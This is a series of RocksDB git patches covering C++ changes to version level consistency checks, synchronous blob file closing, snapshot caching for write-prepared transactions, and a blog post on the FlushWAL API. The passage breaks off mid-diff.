level++) { + for (int level = 0; level < num_levels_; level++) { auto& level_files = vstorage->LevelFiles(level); for (size_t i = 1; i < level_files.size(); i++) { auto f1 = level_files[i - 1]; @@ -196,7 +208,7 @@ class VersionBuilder::Rep { #endif // a file to be deleted better exist in the previous version bool found = false; - for (int l = 0; !found && l < base_vstorage_->num_levels(); l++) { + for (int l = 0; !found && l < num_levels_; l++) { const std::vector& base_files = base_vstorage_->LevelFiles(l); for (size_t i = 0; i < base_files.size(); i++) { @@ -210,7 +222,7 @@ class VersionBuilder::Rep { // if the file did not exist in the previous version, then it // is possibly moved from lower level to higher level in current // version - for (int l = level + 1; !found && l < base_vstorage_->num_levels(); l++) { + for (int l = level + 1; !found && l < num_levels_; l++) { auto& level_added = levels_[l].added_files; auto got = level_added.find(number); if (got != level_added.end()) { @@ -233,6 +245,19 @@ class VersionBuilder::Rep { } } + bool CheckConsistencyForNumLevels() { + // Make sure there are no files on or beyond num_levels(). + if (has_invalid_levels_) { + return false; + } + for (auto& level : invalid_levels_) { + if (level.second.size() > 0) { + return false; + } + } + return true; + } + // Apply all of the edits in *edit to the current state. void Apply(VersionEdit* edit) { CheckConsistency(base_vstorage_); @@ -242,26 +267,45 @@ class VersionBuilder::Rep { for (const auto& del_file : del) { const auto level = del_file.first; const auto number = del_file.second; - levels_[level].deleted_files.insert(number); - CheckConsistencyForDeletes(edit, number, level); - - auto exising = levels_[level].added_files.find(number); - if (exising != levels_[level].added_files.end()) { - UnrefFile(exising->second); - levels_[level].added_files.erase(number); + if (level < num_levels_) { + levels_[level].deleted_files.insert(number); + CheckConsistencyForDeletes(edit, number, level); + + auto exising = levels_[level].added_files.find(number); + if (exising != levels_[level].added_files.end()) { + UnrefFile(exising->second); + levels_[level].added_files.erase(number); + } + } else { + if (invalid_levels_[level].count(number) > 0) { + invalid_levels_[level].erase(number); + } else { + // Deleting an non-existing file on invalid level. + has_invalid_levels_ = true; + } } } // Add new files for (const auto& new_file : edit->GetNewFiles()) { const int level = new_file.first; - FileMetaData* f = new FileMetaData(new_file.second); - f->refs = 1; - - assert(levels_[level].added_files.find(f->fd.GetNumber()) == - levels_[level].added_files.end()); - levels_[level].deleted_files.erase(f->fd.GetNumber()); - levels_[level].added_files[f->fd.GetNumber()] = f; + if (level < num_levels_) { + FileMetaData* f = new FileMetaData(new_file.second); + f->refs = 1; + + assert(levels_[level].added_files.find(f->fd.GetNumber()) == + levels_[level].added_files.end()); + levels_[level].deleted_files.erase(f->fd.GetNumber()); + levels_[level].added_files[f->fd.GetNumber()] = f; + } else { + uint64_t number = new_file.second.fd.GetNumber(); + if (invalid_levels_[level].count(number) == 0) { + invalid_levels_[level].insert(number); + } else { + // Creating an already existing file on invalid level. + has_invalid_levels_ = true; + } + } } } @@ -270,7 +314,7 @@ class VersionBuilder::Rep { CheckConsistency(base_vstorage_); CheckConsistency(vstorage); - for (int level = 0; level < base_vstorage_->num_levels(); level++) { + for (int level = 0; level < num_levels_; level++) { const auto& cmp = (level == 0) ? level_zero_cmp_ : level_nonzero_cmp_; // Merge the set of added files with the set of pre-existing files. // Drop any deleted files. Store the result in *v. @@ -325,7 +369,7 @@ class VersionBuilder::Rep { assert(table_cache_ != nullptr); // std::vector> files_meta; - for (int level = 0; level < base_vstorage_->num_levels(); level++) { + for (int level = 0; level < num_levels_; level++) { for (auto& file_meta_pair : levels_[level].added_files) { auto* file_meta = file_meta_pair.second; assert(!file_meta->table_reader_handle); @@ -386,24 +430,35 @@ VersionBuilder::VersionBuilder(const EnvOptions& env_options, VersionStorageInfo* base_vstorage, Logger* info_log) : rep_(new Rep(env_options, info_log, table_cache, base_vstorage)) {} + VersionBuilder::~VersionBuilder() { delete rep_; } + void VersionBuilder::CheckConsistency(VersionStorageInfo* vstorage) { rep_->CheckConsistency(vstorage); } + void VersionBuilder::CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level) { rep_->CheckConsistencyForDeletes(edit, number, level); } + +bool VersionBuilder::CheckConsistencyForNumLevels() { + return rep_->CheckConsistencyForNumLevels(); +} + void VersionBuilder::Apply(VersionEdit* edit) { rep_->Apply(edit); } + void VersionBuilder::SaveTo(VersionStorageInfo* vstorage) { rep_->SaveTo(vstorage); } + void VersionBuilder::LoadTableHandlers( InternalStats* internal_stats, int max_threads, bool prefetch_index_and_filter_in_cache) { rep_->LoadTableHandlers(internal_stats, max_threads, prefetch_index_and_filter_in_cache); } + void VersionBuilder::MaybeAddFile(VersionStorageInfo* vstorage, int level, FileMetaData* f) { rep_->MaybeAddFile(vstorage, level, f); diff --git a/db/version_builder.h b/db/version_builder.h index 235f79d7f5d..440d4eaf6ba 100644 --- a/db/version_builder.h +++ b/db/version_builder.h @@ -29,6 +29,7 @@ class VersionBuilder { void CheckConsistency(VersionStorageInfo* vstorage); void CheckConsistencyForDeletes(VersionEdit* edit, uint64_t number, int level); + bool CheckConsistencyForNumLevels(); void Apply(VersionEdit* edit); void SaveTo(VersionStorageInfo* vstorage); void LoadTableHandlers(InternalStats* internal_stats, int max_threads, diff --git a/db/version_set.cc b/db/version_set.cc index 6b9611aa9bd..2ff425d2019 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -2842,11 +2842,6 @@ Status VersionSet::Recover( cfd = column_family_set_->GetColumnFamily(edit.column_family_); // this should never happen since cf_in_builders is true assert(cfd != nullptr); - if (edit.max_level_ >= cfd->current()->storage_info()->num_levels()) { - s = Status::InvalidArgument( - "db has more levels than options.num_levels"); - break; - } // if it is not column family add or column family drop, // then it's a file add/delete, which should be forwarded @@ -2930,6 +2925,18 @@ Status VersionSet::Recover( list_of_not_found); } + if (s.ok()) { + for (auto cfd : *column_family_set_) { + assert(builders.count(cfd->GetID()) > 0); + auto* builder = builders[cfd->GetID()]->version_builder(); + if (!builder->CheckConsistencyForNumLevels()) { + s = Status::InvalidArgument( + "db has more levels than options.num_levels"); + break; + } + } + } + if (s.ok()) { for (auto cfd : *column_family_set_) { if (cfd->IsDropped()) { From 503db684f72061b98d2200debafcc750b7f8de67 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 25 Aug 2017 10:40:25 -0700 Subject: [PATCH 153/205] make blob file close synchronous Summary: Fixing flaky blob_db_test. To close a blob file, blob db used to add a CloseSeqWrite job to the background thread to close it. Changing file close to be synchronous in order to simplify logic, and fix flaky blob_db_test. Closes https://github.com/facebook/rocksdb/pull/2787 Differential Revision: D5699387 Pulled By: yiwu-arbug fbshipit-source-id: dd07a945cd435cd3808fce7ee4ea57817409474a --- utilities/blob_db/blob_db_impl.cc | 82 ++++++++++++++----------------- utilities/blob_db/blob_db_impl.h | 16 +++--- utilities/blob_db/blob_db_test.cc | 21 ++++---- 3 files changed, 54 insertions(+), 65 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index d787529b1da..553f89f2a58 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -891,7 +891,10 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } if (blob_inserter.has_put()) { - CloseIf(blob_inserter.last_file()); + s = CloseBlobFileIfNeeded(blob_inserter.last_file()); + if (!s.ok()) { + return s; + } } // add deleted key to list of keys that have been deleted for book-keeping @@ -1022,7 +1025,9 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, extendTTL(&(bfile->ttl_range_), expiration); } - CloseIf(bfile); + if (s.ok()) { + s = CloseBlobFileIfNeeded(bfile); + } TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); return s; @@ -1362,58 +1367,44 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { return std::make_pair(true, -1); } -std::pair BlobDBImpl::CloseSeqWrite( - std::shared_ptr bfile, bool aborted) { +Status BlobDBImpl::CloseBlobFile(std::shared_ptr bfile) { + Status s; + ROCKS_LOG_INFO(db_options_.info_log, "Close blob file %" PRIu64, + bfile->BlobFileNumber()); { WriteLock wl(&mutex_); - // this prevents others from picking up this file - open_blob_files_.erase(bfile); - - auto findit = - std::find(open_simple_files_.begin(), open_simple_files_.end(), bfile); - if (findit != open_simple_files_.end()) open_simple_files_.erase(findit); + if (bfile->HasTTL()) { + size_t erased __attribute__((__unused__)) = open_blob_files_.erase(bfile); + assert(erased == 1); + } else { + auto iter = std::find(open_simple_files_.begin(), + open_simple_files_.end(), bfile); + assert(iter != open_simple_files_.end()); + open_simple_files_.erase(iter); + } } if (!bfile->closed_.load()) { WriteLock lockbfile_w(&bfile->mutex_); - bfile->WriteFooterAndCloseLocked(); + s = bfile->WriteFooterAndCloseLocked(); } - return std::make_pair(false, -1); -} - -void BlobDBImpl::CloseIf(const std::shared_ptr& bfile) { - // atomic read - bool close = bfile->GetFileSize() > bdb_options_.blob_file_size; - if (!close) return; - - if (debug_level_ >= 2) { - ROCKS_LOG_DEBUG(db_options_.info_log, - "Scheduling file for close %s fsize: %" PRIu64 - " limit: %" PRIu64, - bfile->PathName().c_str(), bfile->GetFileSize(), - bdb_options_.blob_file_size); + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to close blob file %" PRIu64 "with error: %s", + bfile->BlobFileNumber(), s.ToString().c_str()); } - { - WriteLock wl(&mutex_); + return s; +} - open_blob_files_.erase(bfile); - auto findit = - std::find(open_simple_files_.begin(), open_simple_files_.end(), bfile); - if (findit != open_simple_files_.end()) { - open_simple_files_.erase(findit); - } else { - ROCKS_LOG_WARN(db_options_.info_log, - "File not found while closing %s fsize: %" PRIu64 - " Multithreaded Writes?", - bfile->PathName().c_str(), bfile->GetFileSize()); - } +Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr& bfile) { + // atomic read + if (bfile->GetFileSize() < bdb_options_.blob_file_size) { + return Status::OK(); } - - tqueue_.add(0, std::bind(&BlobDBImpl::CloseSeqWrite, this, bfile, - std::placeholders::_1)); + return CloseBlobFile(bfile); } bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( @@ -1585,7 +1576,7 @@ std::pair BlobDBImpl::CheckSeqFiles(bool aborted) { } for (auto bfile : process_files) { - CloseSeqWrite(bfile, false); + CloseBlobFile(bfile); } return std::make_pair(true, -1); @@ -1916,7 +1907,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, delete transaction; } ROCKS_LOG_INFO( - db_options_.info_log, "%s blob file %" PRIu64 ".", + db_options_.info_log, + "%s blob file %" PRIu64 ". Total blob records: %" PRIu64 ", Deletes: %" PRIu64 "/%" PRIu64 " succeeded, Relocates: %" PRIu64 "/%" PRIu64 " succeeded.", s.ok() ? "Successfully garbage collected" : "Failed to garbage collect", @@ -2334,8 +2326,8 @@ void BlobDBImpl::TEST_DeleteObsoleteFiles() { DeleteObsoleteFiles(false /*abort*/); } -void BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { - CloseSeqWrite(bfile, false /*abort*/); +Status BlobDBImpl::TEST_CloseBlobFile(std::shared_ptr& bfile) { + return CloseBlobFile(bfile); } Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 9886dbe5b21..e7c49b20d4d 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -263,7 +263,7 @@ class BlobDBImpl : public BlobDB { std::vector> TEST_GetObsoleteFiles() const; - void TEST_CloseBlobFile(std::shared_ptr& bfile); + Status TEST_CloseBlobFile(std::shared_ptr& bfile); Status TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, GCStats* gc_stats); @@ -293,11 +293,6 @@ class BlobDBImpl : public BlobDB { // this handler is called. void OnFlushBeginHandler(DB* db, const FlushJobInfo& info); - // timer queue callback to close a file by appending a footer - // removes file from open files list - std::pair CloseSeqWrite(std::shared_ptr bfile, - bool aborted); - // is this file ready for Garbage collection. if the TTL of the file // has expired or if threshold of the file has been evicted // tt - current time @@ -308,8 +303,11 @@ class BlobDBImpl : public BlobDB { // collect all the blob log files from the blob directory Status GetAllLogFiles(std::set>* file_nums); - // appends a task into timer queue to close the file - void CloseIf(const std::shared_ptr& bfile); + // Close a file by appending a footer, and removes file from open files list. + Status CloseBlobFile(std::shared_ptr bfile); + + // Close a file if its size exceeds blob_file_size + Status CloseBlobFileIfNeeded(std::shared_ptr& bfile); uint64_t ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value); @@ -470,7 +468,7 @@ class BlobDBImpl : public BlobDB { // epoch or version of the open files. std::atomic epoch_of_; - // typically we keep 4 open blob files (simple i.e. no TTL) + // All opened non-TTL blob files. std::vector> open_simple_files_; // all the blob files which are currently being appended to based diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 8ec01698aa8..41c1482e7e6 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -185,7 +185,7 @@ TEST_F(BlobDBTest, PutWithTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -214,7 +214,7 @@ TEST_F(BlobDBTest, PutUntil) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -246,7 +246,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_FALSE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(0, gc_stats.num_deletes); @@ -291,7 +291,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; @@ -338,7 +338,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); auto &data = static_cast(ttl_extractor_.get())->data; @@ -395,7 +395,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { auto blob_files = bdb_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); - bdb_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0])); GCStats gc_stats; ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(100 - data.size(), gc_stats.num_deletes); @@ -592,7 +592,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { } auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); // Test for data in SST size_t new_keys = 0; for (int i = 0; i < 100; i++) { @@ -627,7 +627,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { static_cast_with_check(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", @@ -663,7 +663,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { static_cast_with_check(blob_db_); auto blob_files = blob_db_impl->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); mock_env_->set_now_micros(300 * 1000000); SyncPoint::GetInstance()->LoadDependency( @@ -708,7 +708,6 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { ASSERT_EQ(11, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); ASSERT_TRUE(blob_files[0]->Immutable()); - blob_db_impl->TEST_CloseBlobFile(blob_files[0]); for (int i = 1; i <= 10; i++) { ASSERT_FALSE(blob_files[i]->HasTTL()); if (i < 10) { @@ -736,7 +735,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { ASSERT_EQ(1, blob_files.size()); std::shared_ptr bfile = blob_files[0]; uint64_t bfile_number = bfile->BlobFileNumber(); - blob_db_impl->TEST_CloseBlobFile(bfile); + ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(bfile)); switch (i) { case 0: From b01f426f56c83815d3664f3ba69ff758fcdc8772 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Fri, 25 Aug 2017 16:09:51 -0700 Subject: [PATCH 154/205] Blog post for FlushWAL Summary: Closes https://github.com/facebook/rocksdb/pull/2790 Differential Revision: D5711609 Pulled By: maysamyabandeh fbshipit-source-id: ea103dac013c0a6a031834541ad67e7d95a80fe8 --- docs/_posts/2017-08-24-pinnableslice.markdown | 4 +-- docs/_posts/2017-08-25-flushwal.markdown | 26 +++++++++++++++++++ 2 files changed, 28 insertions(+), 2 deletions(-) create mode 100644 docs/_posts/2017-08-25-flushwal.markdown diff --git a/docs/_posts/2017-08-24-pinnableslice.markdown b/docs/_posts/2017-08-24-pinnableslice.markdown index a5026d5c4c7..7ac2fec34be 100644 --- a/docs/_posts/2017-08-24-pinnableslice.markdown +++ b/docs/_posts/2017-08-24-pinnableslice.markdown @@ -1,5 +1,5 @@ --- -title: PinnableSlice: less memcpy with point lookups +title: PinnableSlice; less memcpy with point lookups layout: post author: maysamyabandeh category: blog @@ -11,7 +11,7 @@ The classic API for [DB::Get](https://github.com/facebook/rocksdb/blob/9e5837111 Similarly to Slice, PinnableSlice refers to some in-memory data so it does not incur the memcpy cost. To ensure that the data will not be erased while it is being processed by the user, PinnableSlice, as its name suggests, has the data pinned in memory. The pinned data are released when PinnableSlice object is destructed or when ::Reset is invoked explicitly on it. -### How good it is? +### How good is it? Here are the improvements in throughput for an [in-memory benchmark](https://github.com/facebook/rocksdb/pull/1756#issuecomment-286201693): * value 1k byte: 14% diff --git a/docs/_posts/2017-08-25-flushwal.markdown b/docs/_posts/2017-08-25-flushwal.markdown new file mode 100644 index 00000000000..01f878e87b7 --- /dev/null +++ b/docs/_posts/2017-08-25-flushwal.markdown @@ -0,0 +1,26 @@ +--- +title: FlushWAL; less fwrite, faster writes +layout: post +author: maysamyabandeh +category: blog +--- + +When `DB::Put` is called, the data is written to both memtable (to be flushed to SST files later) and the WAL (write-ahead log) if it is enabled. In the case of a crash, RocksDB can recover as much as the memtable state that is reflected into the WAL. By default RocksDB automatically flushes the WAL from the application memory to the OS buffer after each `::Put`. It however can be configured to perform the flush manually after an explicit call to ::FlushWAL. Not doing fwrite syscall after each ::Put offers a tradeoff between reliability and write latency for the general case. As we explain below, some applications such as MyRocks benefit from this API to gain higher write throughput with however no compromise in reliability. + +### How much is the gain? + +Using `::FlushWAL` API along with setting `DBOptions.concurrent_prepare`, MyRocks achieves 40% higher throughput in Sysbench's [update-nonindex](https://github.com/akopytov/sysbench/blob/master/src/lua/oltp_update_non_index.lua) benchmark. + +### Write, Flush, and Sync + +The write to the WAL is first written to the application memory buffer. The buffer in the next step is "flushed" to OS buffer by calling fwrite syscall. The OS buffer is later "synced" to the persistent storage. The data in the OS buffer, although not persisted yet, will survive the application crash. By default, the flush occurs automatically upon each call to DB::Put or DB::Write. The user can additionally request sync after each write by setting WriteOptions::sync. + +### FlushWAL API + +The user can turn off the automatic flush of the WAL by setting `DBOptions::manual_wal_flush`. In that case, the WAL buffer is flushed when it is either full or `DB::FlushWAL` is called by the user. The API also accepts a boolean argument should we want to sync right after the flush: `::FlushWAL(true)`. + +### Success story: MyRocks + +Some applications that use RocksDB, already have other machinsims in place to provide reliability. MySQL for example uses 2PC (two-phase commit) to write to both binlog as well as the storage engine such as InnoDB and MyRocks. The group commit logic in MySQL allows the 1st phase (Prepare) to be run in parallel but after a commit group is formed performs the 2nd phase (Commit) in a serial manner. This makes low commit latency in the storage engine essential for acheiving high throughput. The commit in MyRocks includes writing to the RocksDB WAL, which as explaiend above, by default incures the latency of flushing the WAL new appends to the OS buffer. + +Since a storage engine commit is not visible to the users until the group commit finishes, and also because binlog helps in recovering from some failure scenarios, MySQL can provide reliability without however needing a storage WAL flush after each individual commit. MyRocks benefits from this property, disables automatic WAL flush in RocksDB, and manually calls `::FlushWAL` when requested by MySQL. From fbfa3e7a43526bdf38183f78383db62b430e3885 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Sat, 26 Aug 2017 00:53:13 -0700 Subject: [PATCH 155/205] WriteAtPrepare: Efficient read from snapshot list Summary: Divide the old snapshots to two lists: a few that fit into a cached array and the rest in a vector, which is expected to be empty in normal cases. The former is to optimize concurrent reads from snapshots without requiring locks. It is done by an array of std::atomic, from which std::memory_order_acquire reads are compiled to simple read instructions in most of the x86_64 architectures. Closes https://github.com/facebook/rocksdb/pull/2758 Differential Revision: D5660504 Pulled By: maysamyabandeh fbshipit-source-id: 524fcf9a8e7f90a92324536456912a99aaa6740c --- db/snapshot_impl.h | 9 +- include/rocksdb/utilities/transaction_db.h | 6 +- .../pessimistic_transaction_db.cc | 135 ++++++++++++++++-- .../transactions/pessimistic_transaction_db.h | 51 ++++++- utilities/transactions/transaction_test.cc | 33 +++-- 5 files changed, 201 insertions(+), 33 deletions(-) diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index 8441050fd2c..ad9c1a9fbcc 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -74,9 +74,11 @@ class SnapshotList { count_--; } - // retrieve all snapshot numbers. They are sorted in ascending order. + // retrieve all snapshot numbers up until max_seq. They are sorted in + // ascending order. std::vector GetAll( - SequenceNumber* oldest_write_conflict_snapshot = nullptr) const { + SequenceNumber* oldest_write_conflict_snapshot = nullptr, + const SequenceNumber& max_seq = kMaxSequenceNumber) const { std::vector ret; if (oldest_write_conflict_snapshot != nullptr) { @@ -88,6 +90,9 @@ class SnapshotList { } const SnapshotImpl* s = &list_; while (s->next_ != &list_) { + if (s->next_->number_ > max_seq) { + break; + } ret.push_back(s->next_->number_); if (oldest_write_conflict_snapshot != nullptr && diff --git a/include/rocksdb/utilities/transaction_db.h b/include/rocksdb/utilities/transaction_db.h index 7a592c4f6cf..77043897a70 100644 --- a/include/rocksdb/utilities/transaction_db.h +++ b/include/rocksdb/utilities/transaction_db.h @@ -25,8 +25,10 @@ class TransactionDBMutexFactory; enum TxnDBWritePolicy { WRITE_COMMITTED = 0, // write only the committed data - WRITE_PREPARED, // write data after the prepare phase of 2pc - WRITE_UNPREPARED // write data before the prepare phase of 2pc + // TODO(myabandeh): Not implemented yet + WRITE_PREPARED, // write data after the prepare phase of 2pc + // TODO(myabandeh): Not implemented yet + WRITE_UNPREPARED // write data before the prepare phase of 2pc }; const uint32_t kInitialMaxDeadlocks = 5; diff --git a/utilities/transactions/pessimistic_transaction_db.cc b/utilities/transactions/pessimistic_transaction_db.cc index 07c3eeeeb04..8fa9575e430 100644 --- a/utilities/transactions/pessimistic_transaction_db.cc +++ b/utilities/transactions/pessimistic_transaction_db.cc @@ -5,8 +5,13 @@ #ifndef ROCKSDB_LITE +#ifndef __STDC_FORMAT_MACROS +#define __STDC_FORMAT_MACROS +#endif + #include "utilities/transactions/pessimistic_transaction_db.h" +#include #include #include #include @@ -34,6 +39,7 @@ PessimisticTransactionDB::PessimisticTransactionDB( : std::shared_ptr( new TransactionDBMutexFactoryImpl())) { assert(db_impl_ != nullptr); + info_log_ = db_impl_->GetDBOptions().info_log; } // Support initiliazing PessimisticTransactionDB from a stackable db @@ -581,16 +587,23 @@ bool WritePreparedTxnDB::IsInSnapshot(uint64_t prep_seq, return false; } -void WritePreparedTxnDB::AddPrepared(uint64_t seq) { prepared_txns_.push(seq); } +void WritePreparedTxnDB::AddPrepared(uint64_t seq) { + ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Prepareing", seq); + WriteLock wl(&prepared_mutex_); + prepared_txns_.push(seq); +} void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, uint64_t commit_seq) { + ROCKS_LOG_DEBUG(info_log_, "Txn %" PRIu64 " Committing with %" PRIu64, + prepare_seq, commit_seq); auto indexed_seq = prepare_seq % COMMIT_CACHE_SIZE; CommitEntry evicted; bool to_be_evicted = GetCommitEntry(indexed_seq, &evicted); if (to_be_evicted) { auto prev_max = max_evicted_seq_.load(std::memory_order_acquire); if (prev_max < evicted.commit_seq) { + // TODO(myabandeh) inc max in larger steps to avoid frequent updates auto max_evicted_seq = evicted.commit_seq; // When max_evicted_seq_ advances, move older entries from prepared_txns_ // to delayed_prepared_. This guarantees that if a seq is lower than max, @@ -607,11 +620,59 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, delayed_prepared_empty_.store(false, std::memory_order_release); } } + // With each change to max_evicted_seq_ fetch the live snapshots behind it + SequenceNumber curr_seq; + std::vector all_snapshots; + bool update_snapshots = false; { - WriteLock wl(&snapshots_mutex_); InstrumentedMutex(db_impl_->mutex()); - snapshots_ = db_impl_->snapshots().GetAll(); + // We use this to identify how fresh are the snapshot list. Since this + // is done atomically with obtaining the snapshot list, the one with + // the larger seq is more fresh. If the seq is equal the full snapshot + // list could be different since taking snapshots does not increase + // the db seq. However since we only care about snapshots before the + // new max, such recent snapshots would not be included the in the + // list anyway. + curr_seq = db_impl_->GetLatestSequenceNumber(); + if (curr_seq > snapshots_version_) { + // This is to avoid updating the snapshots_ if it already updated + // with a more recent vesion by a concrrent thread + update_snapshots = true; + // We only care about snapshots lower then max + all_snapshots = + db_impl_->snapshots().GetAll(nullptr, max_evicted_seq); + } + } + if (update_snapshots) { + WriteLock wl(&snapshots_mutex_); + snapshots_version_ = curr_seq; + // We update the list concurrently with the readers. + // Both new and old lists are sorted and the new list is subset of the + // previous list plus some new items. Thus if a snapshot repeats in + // both new and old lists, it will appear upper in the new list. So if + // we simply insert the new snapshots in order, if an overwritten item + // is still valid in the new list is either written to the same place in + // the array or it is written in a higher palce before it gets + // overwritten by another item. This guarantess a reader that reads the + // list bottom-up will eventaully see a snapshot that repeats in the + // update, either before it gets overwritten by the writer or + // afterwards. + size_t i = 0; + auto it = all_snapshots.begin(); + for (; it != all_snapshots.end() && i < SNAPSHOT_CACHE_SIZE; + it++, i++) { + snapshot_cache_[i].store(*it, std::memory_order_release); + } + snapshots_.clear(); + for (; it != all_snapshots.end(); it++) { + // Insert them to a vector that is less efficient to access + // concurrently + snapshots_.push_back(*it); + } + // Update the size at the end. Otherwise a parallel reader might read + // items that are not set yet. + snapshots_total_.store(all_snapshots.size(), std::memory_order_release); } while (prev_max < max_evicted_seq && !max_evicted_seq_.compare_exchange_weak( @@ -621,17 +682,41 @@ void WritePreparedTxnDB::AddCommitted(uint64_t prepare_seq, } // After each eviction from commit cache, check if the commit entry should // be kept around because it overlaps with a live snapshot. - { + // First check the snapshot cache that is efficient for concurrent access + auto cnt = snapshots_total_.load(std::memory_order_acquire); + // The list might get updated concurrently as we are reading from it. The + // reader should be able to read all the snapshots that are still valid + // after the update. Since the survived snapshots are written in a higher + // place before gets overwritten the reader that reads bottom-up will + // eventully see it. + const bool next_is_larger = true; + SequenceNumber snapshot_seq = kMaxSequenceNumber; + size_t ip1 = std::min(cnt, SNAPSHOT_CACHE_SIZE); + for (; 0 < ip1; ip1--) { + snapshot_seq = snapshot_cache_[ip1 - 1].load(std::memory_order_acquire); + if (!MaybeUpdateOldCommitMap(evicted.prep_seq, evicted.commit_seq, + snapshot_seq, !next_is_larger)) { + break; + } + } + if (UNLIKELY(SNAPSHOT_CACHE_SIZE < cnt && ip1 == SNAPSHOT_CACHE_SIZE && + snapshot_seq < evicted.prep_seq)) { + // Then access the less efficient list of snapshots_ ReadLock rl(&snapshots_mutex_); - for (auto snapshot_seq : snapshots_) { - if (evicted.commit_seq <= snapshot_seq) { 